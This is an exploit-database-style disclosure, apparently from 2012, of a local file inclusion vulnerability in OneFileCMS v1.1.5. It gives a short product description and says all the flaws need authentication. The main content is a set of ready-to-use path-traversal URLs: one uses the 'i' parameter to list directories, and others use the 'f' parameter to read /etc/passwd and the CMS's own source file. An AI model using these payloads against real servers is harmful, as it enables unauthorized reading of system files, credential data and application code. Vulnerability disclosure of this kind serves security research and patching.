34 lines
No EOL
1.2 KiB
Text
34 lines
No EOL
1.2 KiB
Text
# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
|
|
# Google Dork: --
|
|
# Date: 16/03/2012
|
|
# Author: mr.pr0n (@_pr0n_)
|
|
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
|
|
# Software Link: https://github.com/rocktronica/OneFileCMS
|
|
# Version: OneFileCMS v.1.1.5
|
|
# Tested on: Linux Fedora 14
|
|
|
|
===============
|
|
Description
|
|
===============
|
|
OneFileCMS is just that. It's a flat, light, one file CMS (Content
|
|
Management System) entirely contained in an easy-to-implement, highly
|
|
customizable, database-less PHP script. Coupling a utilitarian code editor
|
|
with all the basic necessities of an FTP application, OneFileCMS can
|
|
maintain a whole website completely in-browser without any external
|
|
programs.
|
|
|
|
=======================================================
|
|
[!] All vulnerabilities requires authentication. [!]
|
|
=======================================================
|
|
|
|
|
|
Directory Listing, using the "i" parameter:
|
|
http://TARGET/onefilecms/onefilecms.php?i=../../../../
|
|
|
|
|
|
Read local files, using the "f" parameter:
|
|
http://TARGET/onefilecms/onefilecms.php?f=../../../../etc/passwd
|
|
http://TARGET/onefilecms/onefilecms.php?f=../../../../var/www/html/onefilecms/onefilecms.php
|
|
|
|
--
|
|
http://ghostinthelab.wordpress.com |